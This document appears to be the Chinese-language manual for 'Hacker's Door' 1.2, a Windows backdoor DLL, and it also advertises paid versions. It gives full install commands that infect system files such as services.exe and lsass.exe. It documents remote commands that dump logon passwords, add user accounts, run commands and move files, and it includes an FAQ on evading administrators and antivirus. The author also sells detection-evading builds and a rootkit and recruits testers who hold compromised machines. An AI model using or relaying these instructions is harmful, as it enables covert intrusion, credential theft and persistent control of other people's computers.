收费版本未经允许,请不要提供下载及用于其它商务活动中。
九、和我联系
如果你发现的bug,请和我联系,最好说明使用的环境,同时把winnt/temp/system.tmp发给我。
个人主页:http://www.yythac.com
Email:webmaster@yythac.com
yyt_hac@163.com
QQ:47090005
黑客之门采用的目前一些先进的后门技术,它只有一个dll文件,通过感染系统文件启动自身,被感染的
系统文件大小和日期都不会改变;同时采用线程插入技术,本身没有进程;它本身不开端口,而是重用系统进程
开的任意一个端口,如80,135,139,445等,这使得它很容易穿透防火墙,目前还没有工具能发现它。
黑客之门独特的文件感染启动方式和端口重用技术使得它的隐蔽性是同类软件中最好的,随着稳定性、易用
性、功能的加强,我相信它必将成为黑客的终极利器。
1.2版的改变:
1、由于反向连接还不成熟,而且会影响隐蔽性,暂时去掉。
2、增加一种使用命令行客户端的连接方式,在这种方式中可以传输文件,在这种方式的命令行窗口
中可以使用一些不即时退出的程序,如ftp,也可以登录到其它的命令行式的后门中,如黑客之门。
3、增加了一些有用的命令。
4、增加了隐蔽性和稳定性,改了一些bug。
5、更多的改进等待你们发现。
【使用环境】
服务器端:Windows 2000及以上操作系统,服务器端默认文件名为hkdoordll.dll
客户端:Windows 2000及以上操作系统,命令行客户端默认文件名为hdclient.exe
配置程序:Windows 2000及以上操作系统,命令行客户端默认文件名为HDConfig.exe
【内容】
一、配置
二、安装
2.1 感染系统文件的安装方式
2.2 通过svchost启动服务的安装方式
三、卸载
四、使用
4.1 使用NC.exe连接的方式
4.2 使用命令行客户端连接的方式
五、常见问题解答
六、招收测试人员
七、收费服务
八、特别声明
九、和我联系
一、配置
运行HDConfig.exe,选择要进行配置的黑客之门服务器端,默认是hkdoordll.dll,保存设置的时候会提示你输入
密码,如果你以前没有配置过,那就是初始密码yyt_hac,否则就是你自己配置的密码,然后你就可以修改密码了。这个密
码用于连接和卸载后门。
二、安装
由于目前Windows xp sp2下的数据执行保护功能不允许用rundll32.exe执行dll中的函数,因此如果要在xp sp2
下安装,必须先禁止数据执行保护功能。
2、1 感染系统文件的安装方式
注意:其中‘DllRegisterServer’是大小写敏感的,以下所有演示过程都是在命令行窗口下进行的。
C:/>rundll32 hkdoordll,DllRegisterServer conime.exe 1 1
上面的方式只感染进程,而不感染系统文件,机器重启或进程退出后门也就退出了,适用于在自己的
机器上做测试,如果你不是做测试,就用下面的安装方式。
其中 hkdoordll是黑客之门服务器端,必须放在system32目录下,可以改名,conime.exe是你要感染的进程
默认是services.exe,如果要感染系统文件,在system32目录下的不用带路径,其它的就要带路径,第一个1是安装方式,
0表示只感染系统文件,1表示只感染进程,2表示感染系统文件,同时感染进程,默认是2;第2个1是启动方法,0是通
过创建svchost启动的服务来启动后门,1是通过感染系统文件来启动后门,默认是1。
C:/>rundll32 hkdoordll,DllRegisterServer
上面是默认安装方式,它会感染services.exe文件,以便在系统重启时启动后门,同时把自己加载到
services.exe进程中
注意:除了csrss.exe,smss.exe外,其它的系统文件都可以感染
要判断有没有安装成功,就要看system.tmp里的信息,它放在%winnt%/temp目录下,方法如下:
C:/WINNT/temp>type system.tmp //这个文件的生成会有延时,多type几次
系统找不到指定的文件。
C:/WINNT/temp>type system.tmp
2/27/2005 21:21:59 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,
Param[0]=C:/WINNT/system32/services.exe,Param[1]=hkdoordll.dll,Param[2]=DllRegisterServer
2/27/2005 21:21:59 l=0
Freeing 'hkdoordll.dll':
2/27/2005 21:21:59 l=0
Couldn't free
2/27/2005 21:21:59 l=0
Entering DLL_PROCESS_ATTACH,Process:Services.exe
2/27/2005 21:21:59 l=0
Begin to start hacker's door....
2/27/2005 21:21:59 l=0
UnloadDriver successfully!
2/27/2005 21:21:59 l=0
Begin to start hacker's door....
2/27/2005 21:21:59 l=0
OS system info:System Version:Windows nt 5.0 build:2195
Service Pack:2.0
Product type:Windows 2000/xp/2003 Professional
,SEQ:1.2pub0001,IsInstall:1
2/27/2005 21:21:59 l=0
Loading 'hkdoordll.dll':
2/27/2005 21:21:59 l=0
Loaded (0x10000000)
2/27/2005 21:22:1 l=0
Start hacker's door successfully!
2/27/2005 21:22:2 l=0
The backdoor is installed successfully!
C:/WINNT/temp>
看到“Start hacker's door successfully!”就说明安装成功了,否则就是没有成功,
你可以试试感染别的系统文件。
C:/>rundll32 hkdoordll,DllRegisterServer lsass.exe
上面是感染lsass.exe文件,同时把自己加载到lsass.exe进程中
C:/>rundll32 hkdoordll,DllRegisterServer c:/winnt/explorer.exe
上面是感染explorer.exe文件,同时把自己加载到explorer.exe进程中
注意:
安装成功或失败信息在winnt/temp/system.tmp里有记录。
在终端服务器中,直接安装出现如下错误:
C:/WINNT/system32>rundll32 hkdoordll,DllRegisterServer
C:/WINNT/temp>type system.tmp
9/2/2004 10:46:28 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1, Param[0]=C:/WINN
T/system32/services.exe,Param[1]=hkdoordll.dll,Param[2]=DllRegisterServer
9/2/2004 10:46:28 l=0
InjectThread:Error CreateRemoteThread,error code:8
9/2/2004 10:46:28 l=0
InjectThread failed!
C:/WINNT/system32>
因为在msdn里说
Terminal Services isolates each terminal session by design. Therefore,
CreateRemoteThread fails if the target process is in a different session
than the calling process.
因此你用下面的方法安装(也可以用at命令用计划任务安装):
C:/WINNT/system32>psexec //127.0.0.1 -u administrator cmd.exe
PsExec v1.31 - execute processes remotely
Copyright (C) 2001-2002 Mark Russinovich
www.sysinternals.com
Password:
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:/WINNT/system32>rundll32 hkdoordll,DllRegisterServer
C:/WINNT/temp>type system.tmp //这个文件的生成会有延时,多type几次
系统找不到指定的文件。
C:/WINNT/temp>type system.tmp
2/27/2005 21:21:59 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,
Param[0]=C:/WINNT/system32/services.exe,Param[1]=hkdoordll.dll,Param[2]=DllRegisterServer
2/27/2005 21:21:59 l=0
Freeing 'hkdoordll.dll':
2/27/2005 21:21:59 l=0
Couldn't free
2/27/2005 21:21:59 l=0
Entering DLL_PROCESS_ATTACH,Process:Services.exe
2/27/2005 21:21:59 l=0
Begin to start hacker's door....
2/27/2005 21:21:59 l=0
UnloadDriver successfully!
2/27/2005 21:21:59 l=0
Begin to start hacker's door....
2/27/2005 21:21:59 l=0
OS system info:System Version:Windows nt 5.0 build:2195
Service Pack:2.0
Product type:Windows 2000/xp/2003 Professional
,SEQ:1.2pub0001,IsInstall:1
2/27/2005 21:21:59 l=0
Loading 'hkdoordll.dll':
2/27/2005 21:21:59 l=0
Loaded (0x10000000)
2/27/2005 21:22:1 l=0
Start hacker's door successfully!
2/27/2005 21:22:2 l=0
The backdoor is installed successfully!
C:/WINNT/system32>
这样就安装成功了
2、2 通过svchost启动服务的安装方式
注意:这种方法可以在3389终端中直接安装。
在命令行下运行‘rundll32 hkdoordll,DllRegisterServer 服务名 2 0’就可以了,其中‘服务名’必须合法,
如运行‘rundll32 hkdoordll,DllRegisterServer Iprip 2 0’,就创建用svchost.exe来启动的Iprip服务来
启动黑客之门,如果你不知道合法的服务名,可以先随便给一个,然后到日志里去看合法的服务名列表。卸载用
‘rundll32 hkdoordll,DllUnRegisterServer 密码 服务名 2 0’,如rundll32 hkdoordll,DllUnRegisterServer
yyt_hac Iprip 2 0’,密码和服务名必须正确。
C:/>rundll32 hkdoordll,DllRegisterServer aaa 2 0 //随便用一个服务名安装黑客之门
C:/>type c:/winnt/temp/system.tmp //查看log,得到合法的服务名
1/21/2005 23:17:37 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=0, Param[0]=aaa,
Param[1]=C:/WINNT/system32/hkdoordll.dll,Param[2]=svchost.exe
1/21/2005 23:17:37 l=0
Freeing 'C:/WINNT/system32/hkdoordll.dll':
1/21/2005 23:17:37 l=0
Couldn't free
1/21/2005 23:17:37 l=0
you specify service name not in Svchost/netsvcs, must be one of following:
1/21/2005 23:17:37 l=0 //下面就是合法的服务名
EventSystem Ias Iprip Irmon Netman Nwsapagent Rasauto Rasman Remoteaccess SENS
Sharedaccess Ntmssvc wzcsvc
1/21/2005 23:17:37 l=0
Invalid Service Name
1/21/2005 23:17:37 l=0
The backdoor is failed to be installed!
//从上面日志中选择一个服务名安装黑客之门,同时启动服务,下面选择的服务名为iprip。
C:/>rundll32 hkdoordll,DllRegisterServer iprip 2 0
C:/>type c:/winnt/temp/system.tmp
1/21/2005 23:3:35 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=0, Param[0]
aram[1]=C:/WINNT/system32/hkdoordll.dll,Param[2]=svchost.exe
1/21/2005 23:3:35 l=0
Freeing 'C:/WINNT/system32/hkdoordll.dll':
1/21/2005 23:3:35 l=0
Couldn't free
1/21/2005 23:3:35 l=0
The backdoor is installed successfully!
1/21/2005 23:3:35 l=0
Entering DLL_PROCESS_ATTACH,Process:svchost.exe
1/21/2005 23:3:35 l=0
Begin to start hacker's door....
1/21/2005 23:3:35 l=0
UnloadDriver successfully!
1/21/2005 23:3:35 l=0
Begin to start hacker's door....
1/21/2005 23:3:35 l=0
OS system info:System Version:Windows nt 5.0 build:2195
Service Pack:4.0
Product type:Windows 2000/xp/2003 Server
,SEQ:1.2beta0002,IsInstall:0
1/21/2005 23:3:37 l=0
Start hacker's door successfully!
三、卸载
C:/>rundll32 hkdoordll,DllUnRegisterServer yyt_hac conime.exe 1
这里yyt_hac是连接密码,必须正确,否则不能卸载。其它的参数同安装意义差不多,它根据安装的
方法来卸载后门,上面一行的意思就是把后门从conime.exe进程中卸掉。
C:/>rundll32 hkdoordll,DllUnRegisterServer yyt_hac
上面就是把后门从services.exe进程中卸掉,同时修复被感染的services.exe文件。
C:/>rundll32 hkdoordll,DllUnRegisterServer yyt_hac lsass.exe
上面就是把后门从lsass.exe进程中卸掉,同时修复被感染的lsass.exe文件。
C:/>rundll32 hkdoordll,DllUnRegisterServer yyt_hac c:/winnt/explorer.exe
上面就是把后门从explorer.exe进程中卸掉,同时修复被感染的explorer.exe文件。
C:/>rundll32 hkdoordll,DllUnRegisterServer yyt_hac iprip 2 0
上面是卸载黑客之门的服务iprip,同时把黑客之门的dll从svchost.exe卸载掉。
C:/>type c:/winnt/temp/system.tmp //下面的信息说明服务已经卸载掉,而且黑客之门已经
退出,但是黑客之门的dll没有被从svchost.exe进程中卸载。
1/21/2005 23:4:42 l=0
The backdoor is running
1/21/2005 23:4:43 l=0
Uninstall step 1
1/21/2005 23:4:43 l=0
Uninstall step 2
1/21/2005 23:4:44 l=0
Uninstall step 3
1/21/2005 23:4:44 l=0
closehandle
1/21/2005 23:4:44 l=0
Recv exit event,the backdoor exited!
1/21/2005 23:4:46 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=0, Param[0]=iprip,
Param[1]=C:/WINNT/system32/hkdoordll.dll,Param[2]=svchost.exe
1/21/2005 23:4:47 l=0
Freeing 'C:/WINNT/system32/hkdoordll.dll':
1/21/2005 23:4:47 l=0
Couldn't free
下面的信息说明卸载完全成功了:
Uninstall step 1
3/20/2005 15:36:21 l=0
Uninstall step 2
3/20/2005 15:36:23 l=0
Uninstall step 3
3/20/2005 15:36:23 l=0
Terminate thread:0
3/20/2005 15:36:23 l=0
closehandle
3/20/2005 15:36:23 l=0
Recv exit event,the backdoor exited!
3/20/2005 15:36:25 l=0
Modth.Flag=2,Modth.ModifyModth=1,Modth.StartModth=1,
Param[0]=C:/WINNT/system32/services.exe,Param[1]=hkdoordll.dll,Param[2]=DllUnregisterServer
3/20/2005 15:36:25 l=0
Freeing 'hkdoordll.dll':
3/20/2005 15:36:25 l=0
Released (0x10000000)
3/20/2005 15:36:25 l=0
The backdoor is uninstalled successfully!
卸载成功或失败信息在winnt/temp/system.tmp里有记录。
四、使用
4、1 使用NC.exe连接的方式
用nc连接被安装后门的机器的任意一个开的端口,这个端口必须能连接上,下面用139端口做例子,
然后输入“NCLOGIN 连接密码”,连接密码默认是yyt_hac,你可以在自己机器上试验,只要一台机器就可以了,
不需要在一台机器上安装,用另一台机器连接。支持多个连接,目前最多3个。
注意:[如果你不知道怎么用,可以看黑客之门1.0的动画教程]
C:/>nc 192.8.8.1 139
NCLOGIN yyt_hac
This is the server of hacker's door made by yyt_hac,
Welcome to http://www.yythac.com
HKDOOR>? //得到命令的帮助信息
?-------------------[command],Get command list and the descript of the command
hdver-------------------Get the version of hacker's door installed
findpass-------------------Get all logon user's username and password
open3389-------------------[port] [/r],with 'port' to special termserver 's port
,with '/r' to reboot system
opentelnet-------------------[port],open telnet server with [port],default port
is 23
pslist-------------------Get process list from remote machine
pskill-------------------pID,Kill the process of remote machine
getsysinfo-------------------Get the system info from remote machine
shutdown-------------------[/r],With '/r' to reboot system,else power off system
exitshell-------------------Exit the shell of hacker's door
HKDOOR>findpass //查找所有登录用户的用户名和密码
The session:0 login information is:
Domain:YYT_HAC,User:Administrator,Password:123456
HKDOOR>getsysinfo //得到基本的机器信息
Number of CPU:1
Type of CPU:Intel Pentium III or high
System Version:Windows nt 5.0 build:2195
Service Pack:4.0
Product type:Windows 2000 Server
Computer Name:YYT_HAC
System Dir:C:/WINNT/system32
HKDOOR>exitshell
Exit Successfully
C:/>
4、2 使用命令行客户端连接的方式
注意:各个版本的客户端和服务器端是一一对应的,不能相互混用。
F:/>hdclient
It is the client of hacker's door 1.2 public version
Welcome to http://www.yythac.com
usage:hdclient destip [port] [-p password] [-t logintype]
destip-------------The computer you want to connect //已经安装黑客之门机器的ip
//要连接的端口,不提供将自动扫描端口
port---------------The dest tcp port which send packet to(default is auto scan)
登录方式(0:NC连接方式,1:命令行客户端连接方式,默认是1)
logintype----------The login type which the session uses(default is 1)
password-----------The hacker's door's password //登录黑客之门的密码
Example:hdclient 192.168.1.100 139 -p yyt_hac -t 1
F:/>hdclient 192.8.8.83 -p yyt_hac //登录192.8.8.83机器,自动扫描端口,使用密码是"yyt_hac"
It is the client of hacker's door 1.2 public version
Welcome to http://www.yythac.com
Using auto select port mode //开始扫描端口
Begin Scan Port..........Find port:25 Opened! //发现25端口打开
Begin Connect to server '192.8.8.83:25'...connected! //连接到远程机器
Begin Login...Logined! //登录黑客之门成功
This is the server of hacker's door made by yyt_hac,
Welcome to http://www.yythac.com,use '?' to get command list
HKDOOR>exitshell //退出黑客之门shell
Exit Successfully
F:/>hdclient 192.8.8.83 445 -p yyt_hac //使用445端口连接到黑客之门
It is the client of hacker's door 1.2
Welcome to http://www.yythac.com
Begin Connect to server...connected!
Begin Login...Logined!
This is the server of hacker's door made by yyt_hac,
Welcome to http://www.yythac.com,use '?' to get command list
HKDOOR>? //得到黑客之门的命令列表
********The Command List of Hacker's door********
?-----------------[command],Get command list and the descript of the command
hdver-------------Get the version of hacker's door installed
findpass----------Get all logon user's username and password
open3389----------[port] [/r],with 'port' to special termserver 's port,with '/r
' to reboot system
opentelnet--------[port],open telnet server with [port],default port is 23
pslist------------Get process list from remote machine
pskill------------pID,Kill the process of remote machine
getsysinfo--------Get the system info from remote machine
shutdown----------[/r],With '/r' to reboot system,else power off system
exitshell---------Exit the shell of hacker's door
winexec-----------command,execute command using winexec function
openshell---------[cmdfile],use cmdfile to create a process to execute command
geturl------------url [localfilename],get file from 'url' to 'localfilename'
getdisk-----------get all disk
getdir------------list all files and dirs
getfile-----------[srcfile] [dstfile],get [srcfile] from remote machine to local
machine,and rename to [dstfile]
putfile-----------[srcfile] [dstfile],put [srcfile] from local machine to remote
machine,and rename to [dstfile]
cddir-------------[dir],change current dir to [dir]
HKDOOR>hdver //得到黑客之门服务器端的版本
The version of hacker's door server is 1.2
Welcome to http://www.yythac.com
HKDOOR>cddir //得到当前目录
C:/WINNT/system32
HKDOOR>getdir c:/ //得到c:/目录和文件列表
boot.ini bootfont.bin BOOTSECT.DOS CONFIG.SYS [DELL] [Documen
ts and Settings] [Downloads] [DRIVERS] [drvrtmp] hiberfil
.sys [hkdoor] [Inetpub] IO.SYS [log] MSDOS.SYS [My Musi
c] NTDETECT.COM ntldr pagefile.sys [Program Files] [RECYCLER]
[symserver] [System Volume Information] [wgjxsourcefile] [WINDOWS
] [WINNT] [WUTemp]
HKDOOR>cddir f:/ //改变当前目录为f:/
Change dir successfully!
HKDOOR>getdir //得到当前目录的列表
[Documents and Settings] DrvFltIp.sys [drvrtmp] Hackkit.exe
hdclient.exe hkdoor12beta.rar [i386] [msdownld.tmp] [My Music]
HKDOOR>getdisk //得到所有盘符
c: d: f: g: h: i:
//把远程机器上的c:/shares/nc.exe下载到本地的c:/nc.exe
HKDOOR>getfile c:/shares/nc.exe c:/nc.exe
Begin get file....
Get file successfully!
HKDOOR>putfile c:/nc.exe c:/b.exe //把本地的c:/nc.exe上传到远程机器的c:/b.exe
Begin put file....Put file successfully!
HKDOOR>getdir c:/ //可以看到b.exe已经存在了
AUTOEXEC.BAT b.exe boot.ini bootfont.bin CONFIG.SYS [Documen
ts and Settings] IO.SYS MSDOS.SYS NTDETECT.COM ntldr pagefile
.sys [Program Files] [RECYCLER] [shares] [System Volume Informati
on] [WINDOWS]
HKDOOR>pslist //查看进程
ProcessID ProcessName
176 /SystemRoot/System32/smss.exe
200 /??/C:/WINNT/system32/csrss.exe
224 /??/C:/WINNT/system32/winlogon.exe
252 C:/WINNT/system32/services.exe
264 C:/WINNT/system32/lsass.exe
364 C:/WINNT/System32/termsrv.exe
504 C:/WINNT/system32/svchost.exe
544 C:/WINNT/system32/spoolsv.exe
780 C:/WINNT/System32/msdtc.exe
860 D:/program files/nav/defwatch.exe
876 C:/WINNT/system32/Dfssvc.exe
900 C:/WINNT/System32/tcpsvcs.exe
920 C:/WINNT/System32/svchost.exe
948 C:/WINNT/system32/cba/pds.exe
1000 C:/WINNT/System32/ismserv.exe
1024 C:/WINNT/System32/llssrv.exe
1080 D:/program files/nav/rtvscan.exe
1168 D:/Program Files/SSC/NSCTOP.EXE
1292 C:/WINNT/system32/ntfrs.exe
1392 D:/Program Files/Symantec/Quarantine/Server/qserver.exe
1412 C:/WINNT/system32/regsvc.exe
1424 C:/WINNT/System32/locator.exe
1440 D:/Program Files/Symantec/Quarantine/Server/ScanExplicit.exe
1448 C:/WINNT/system32/MsgSys.EXE
1504 C:/WINNT/system32/MSTask.exe
1556 C:/Program Files/RaidMan/RaidServ.exe
1584 C:/WINNT/System32/svchost.exe
1704 C:/WINNT/System32/WBEM/WinMgmt.exe
1744 C:/WINNT/System32/wins.exe
1760 C:/Program Files/UltraVNC/WinVNC.exe
1784 C:/WINNT/system32/svchost.exe
1816 C:/WINNT/System32/dns.exe
1868 D:/Program Files/Symantec/Quarantine/Server/IcePack.exe
1960 C:/WINNT/system32/ams_ii/hndlrsvc.exe
2016 C:/WINNT/system32/ams_ii/iao.exe
2052 C:/WINNT/system32/cba/xfr.exe
2184 D:/exchsrvr/bin/mad.exe
2424 C:/WINNT/System32/svchost.exe
2456 D:/exchsrvr/bin/dsamain.exe
2832 D:/exchsrvr/bin/store.exe
2900 D:/exchsrvr/bin/emsmta.exe
3256 D:/exchsrvr/bin/events.exe
2768 C:/Program Files/NAVMSE/NAVESRV.EXE
3400 D:/exchsrvr/bin/dxa.exe
3444 D:/EXCHSRVR/connect/msexcimc/bin/msexcimc.exe
3516 C:/Program Files/NAVMSE/naveap.exe
1912 C:/WINNT/system32/MAPISP32.EXE
664 C:/WINNT/system32/dllhost.exe
1036 C:/WINNT/command.exe
2432 C:/WINNT/Explorer.EXE
3204 D:/PROGRA~1/nav/vptray.exe
4076 /??/C:/WINNT/system32/csrss.exe
2036 /??/C:/WINNT/system32/winlogon.exe
2448 C:/WINNT/Explorer.EXE
2564 C:/WINNT/system32/tsadmin.exe
2896 C:/WINNT/system32/taskmgr.exe
4124 C:/WINNT/system32/cmd.exe
HKDOOR>pskill taskmgr.exe //杀进程,可以用进程ID和进程名
The process has been killed!
HKDOOR>winexec "cmd /c copy c:/winnt/system32/cmd.exe c:/winnt/temp/a.exe" //执行内部命令
Command execute successfully!
HKDOOR>winexec "net user test /add" //执行外部命令
Command execute successfully!
HKDOOR>openshell //开命令行窗口
Command shell is opened successfully!
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
c:/>
c:/>ftp ftp.microsoft.com //在shell环境下使用ftp
Connected to ftp.microsoft.com.
220 Microsoft FTP Service
User (ftp.microsoft.com:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Welcome to ftp.microsoft.com. Please also visit http://www.microsoft.com/do
wnloads.
230 Anonymous user logged in.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
bussys
deskapps
developr
KBHelp
MISC
MISC1
peropsys
Products
PSS
ResKit
Services
Softlib
226 Transfer complete.
ftp: 101 bytes received in 0.01Seconds 6.73Kbytes/sec.
ftp> cd reskit
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
bork
IIS4
mspress
nt4
win2000
win98
y2kfix
226 Transfer complete.
ftp: 50 bytes received in 0.01Seconds 3.33Kbytes/sec.
ftp> bye
221 Thank you for visiting ftp.microsoft.com.
c:/>nc 192.8.8.83 445 //可以用ctrl+c中断进程
^C
c:/>nc 192.8.8.1 21 //连接到另一台机器上的黑客之门
220 yyt_hac Microsoft FTP Service (Version 5.0).
NCLOGIN HelloWorld! //输入NCLOGIN 连接密码
This is the server of hacker's door made by yyt_hac,
Welcome to http://www.yythac.com,use '?' to get command list
HKDOOR>openshell //开当前黑客之门的shell
Command shell is opened successfully!
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:/WINNT/system32>
C:/WINNT/system32>exit //退出当前黑客之门命令行窗口
HKDOOR>exitshell //退出当前的黑客之门
Exit Successfully
c:/>exit //再退出当前黑客之门命令行窗口
HKDOOR>exitshell //这里就完全退出黑客之门,返回本地机器
Exit Successfully
F:/>
五、常见问题解答(请先看使用说明和动画教程)
黑客之门1.0使用说明:http://www.yythac.com/ar/hk_readme_cn.txt
黑客之门1.0动画教程:http://www.yythac.com/ar/hk_dhjx.html
5、1 隐蔽性方面的问题
1、黑客之门服务器端的日期是最新的,放在system32目录下如果按时间排列方式查看文件很容易被发现?
答:这个问题很简单,因为文件的时间是很容易改变的,如果你会编程只要几行代码就行,如果不会编程
就找网上找工具吧,不过1.1、1.2版配置程序会把服务器端的时间改成和system32目录下其它系统文件
差不多,这个问题已经不是问题了。
2、黑客之门服务器端文件的属性信息中包含了hkdoordll的信息,容易被发现?
答:这个问题也很简单,因为这些信息也是可以改的,用exescope就可以了。
3、黑客之门服务器端需要放在system32目录下,如果管理员定期备份system32下的文件列表的话,一比较
就可以发现黑客之门?
答:首先这样做的管理员不多,其次黑客之门服务器端也不一定要放在system32目录下,使用说明中说要
放在system32目录下是因为怕一些人乱放,因为放错了会导致系统崩溃,具体还有哪些地方可以放我就不
说了,因为要具体问题具体分析。
4、黑客之门服务器端的dll在进程中不隐藏,因此只要看到进程中加载了hkdoordll.dll就发现黑客之门了?
答:这个问题超级菜,因为黑客之门服务端是可以改名的,你把它改成和系统文件相似的名字不就行了,
伪装一下嘛,没有人去抢劫还会在自己脑袋写上“我是强盗”的。
总结:黑客之门本身隐蔽性已经做的很好了,可是如果你不会用它,那它的隐蔽性再好也是枉然,就像一把
绝世好剑落到一个不会使剑的人手中,那和一把普通的剑也没什么区别,只有在真正的剑客手中才能发挥出
它最大的威力。
5、2 配置方面的问题
1、当我配置好黑客之门服务器端,要保存配置信息的时候,却提示要输入密码,这个密码是什么?
答:如果这个黑客之门服务器端你以前没有配置过,那就是初始密码yyt_hac,否则就是你自己配置的密码。
2、配置黑客之门服务器端时那个连接密码有什么用?
答:这个密码就是你以后登录黑客之门服务器端和卸载黑客之门服务器时要用到的密码。
5、3 安装方面的问题
1、为什么我用 rundll32 hkdoordll,DllRegisterServer安装时,弹出对话框说“加载hkdoordll出错,找
不到指定的模块”?
答:首先,你有没有把黑客之门服务器端放在system32目录下,其次你是否把黑客之门服务端改名了,如果
你把它改成了kernel.dll,就必须用 rundll32 kernel,DllRegisterServer 安装。
2、为什么我用 rundll32 hkdoordll,dllregisterserver 安装时,弹出对话框说“hkdoordll出错,丢失
条目:dllregisterserver”?
答:“dllregisterserver”应该为“DllRegisterServer”,要区分大小写,要完全一样。
3、为什么安装黑客之门后在system32中找不到system.log文件?
答:新版黑客之门的日志在winnt/temp/system.tmp里。
4、安装时为什么在日志中看到“InjectThread:"d~zKBz&zjpBz9;~zKlJJSK#Vzlf" error code:8”或“远程
执行线程失败!”或“CreateRemoteThread failed!”,从而没有安装成功?
答:首先你要确定你有administrator或system用户权限,其次你要确定你不是在3389终端中直接安装黑客
之门,如果你没有权限,那要先提升权限,如果你在3389终端中安装,请看使用说明中的安装方法。
5、安装时为什么在日志中看到"cannot find enough space to add import function"或"没有足够的空间用
来增加新的输入函数"从而安装失败?
答:对于这个问题你只能换一个系统文件来感染,那么多系统文件不可能找不到合适的,再说黑客之门也不是
一定要感染系统文件,任何在系统启动时会自动运行的文件都可以。
6、我安装了以前版本的黑客之门,怎么升级成新版的?
答:一种方法是先卸载老版本的黑客之门,然后安装新的,不过安装时不要感染和老版本一样的系统文件,安
装成功后就行了,另一种方法是先把老的黑客之门服务器端改名,然后把新的黑客之门服务器端改成老的黑客
之门服务器端改名之前的名字就可以了,不过要系统启动后新的黑客之门才会生效。
7、为什么我用加密压缩软件处理过黑客之门服务器端后,安装黑客之门会导致系统崩溃?
答:黑客之门服务器端只能用exe压缩软件压缩,不要用exe加密软件加密,否则可能会导致这种问题。
5、4 连接方面的问题
1、使用说明中提到的nc是什么东西?
答:这个问题我真的不想回答,我只想告诉你nc是一个很出名的网络工具,其它的自己到网上去找。
2、为什么我用nc连接后,用netstat命令看到连接已经建立,却看不到任何提示信息(比如提示输入密码)?
答:黑客之门最大的一个特点就它的端口重用特性,这也是它和目前其它一些后门的区别,你连接的端口是
系统本身开的,和黑客之门没有关系,连接建立后黑客之门当然不会返回信息,假如它返回信息那还有什么
隐蔽性可言。要有返回信息也是开端口的进程返回的信息,比如你连接21端口,就会返回登录ftp服务器的信息,
这时你必须输入“NCLOGIN 连接密码”才能登录黑客之门。
3、为什么我用nc连接后,没法输入“NCLOGIN 连接密码”?
答:这是因为连接根本没有建立起来,你要选择一个目标机器开的,而且你能连接上的端口才行。
4、如果目标机器没有开任何一个端口(包括用防火墙封了所有端口),我能连上黑客之门吗?
答:对于这种机器只有用反向连接方式才行,目前反向连接方式只有1.1版支持,1.2版不支持,因此1.2版没法
连上黑客之门。
5、我能连接上内网中装了黑客之门的机器吗?
答:如果你和那台内网机器在同一个局域网中,那是可以的,否则参考问题4的答案。
6、为什么我在资源管理器中双击hdclient.exe后,只是有个黑窗口一闪,然后什么都没有?
答:hdclient.exe是黑客之门命令行客户端,用来在命令行下连接到黑客之门服务器端,必须在命令行窗口下
使用。
7、我用hdclient.exe登录黑客之门服务器端后,用openshell命令开了命令行窗口,但是命令行窗口却没有滚
动条,没法看超过一屏的输出,怎么办?
答:hdclient.exe登录黑客之门服务器端后,开的命令行窗口是没有滚动条的,但是你可以在其中用一些不实时
退出的工具,如ftp,也可以登录到其它的后门中,如果你想看超过一屏的输出,可以在命令后加more命令,如
'dir | more',用nc登录后开的命令行窗口就有滚动条了,可是不能用不实时退出的工具。
8、用nc.exe连接和用hdclient.exe连接登录黑客之门服务器端后有什么区别?
答:用hdclient.exe登录黑客之门服务器端后能够使用1.2版新加的命令,可以上传和下载文件,开命令行端口后
可以在其中用一些不实时退出的工具,如ftp,也可以登录到其它的后门中,而且连接也进行了加密和压缩;而用
nc连接后就没有这些优点,不过它和服务器端交换的信息少,速度比较快。
总结:上面的一些问题很多都是很简单的,出现这些问题有的是因为使用者水平比较低,有的是因为没有仔细看
使用说明,黑客之门目标是要成为一个专业级后门,而不是傻瓜式的木马,我希望它成为真正黑客的终极之剑,
而不是给菜鸟使用的菜刀。所以要想真正用好黑客之门,自身的水平是很重要的。
六、招收测试人员
为了把黑客之门做得更好,需要一些稳定的内部测试人员,条件如下:
1、有很好的上网条件。
2、有比较高的计算机水平,特别是对后门技术有一定的了解。
3、有一定数量的肉鸡。
测试人员的义务:
1、帮忙测试最新版的黑客之门,提交完整的测试报告。
测试人员的权利:
1、黑客之门最新公开版发布两周后,将给测试人员一份测试人员专用版,它和公开版和内部版的特征码都不相同,
不会生成日志,不会被杀毒软件查杀。
2、通过本人非公开QQ定期进行技术交流,帮助测试人员解决各种技术问题。
如果你符合条件并且想成为黑客之门的内部测试人员,请与我联系。
七、收费服务
为了满足一些人的需求,本人成立yyt_hac工作室,同时提供下列收费服务:
1、出售黑客之门内部版--价格:58元/份,所有的内部版具有相同的特征码,如果被查杀可以免费更换同一版本
的黑客之门内部免查杀版。
2、出售黑客之门个人版--价格:98元/份,各个个人版都有不同的特征码,个人版之间及个人版与其它版本之间
客户端不通用,如果被查杀可以免费更换同一版本的黑客之门个人免查杀版。
3、提供黑客之门定制服务--价格:根据工作量大小而定,专门为一些有特殊需要的人定制,收费会比较高,一般
的人用内部版或个人版就足够了。
4、出售yyt_hac's ntrootkit 1.22 免查杀版--78元/份,如果被查杀可以免费更换同一版本的ntrootkit免查杀
版。
5、提供定制其它各种网络安全及黑客类软件服务,价格面议。
黑客之门内部版和黑客之门个人版在黑客之门公开版发布两周后提供,我的朋友和帮助过我的人可以免费索取,
购买收费版的用户可以通过本人专用QQ得到技术支持。
如果你有这方面的需求,请与我联系,我们的口号是‘只有想不到,没有做不到’!
如果你有项目介绍给我,项目成功完成后,你将得到项目总费用的10%,不到100元的等积累到100再付。
购买须知:
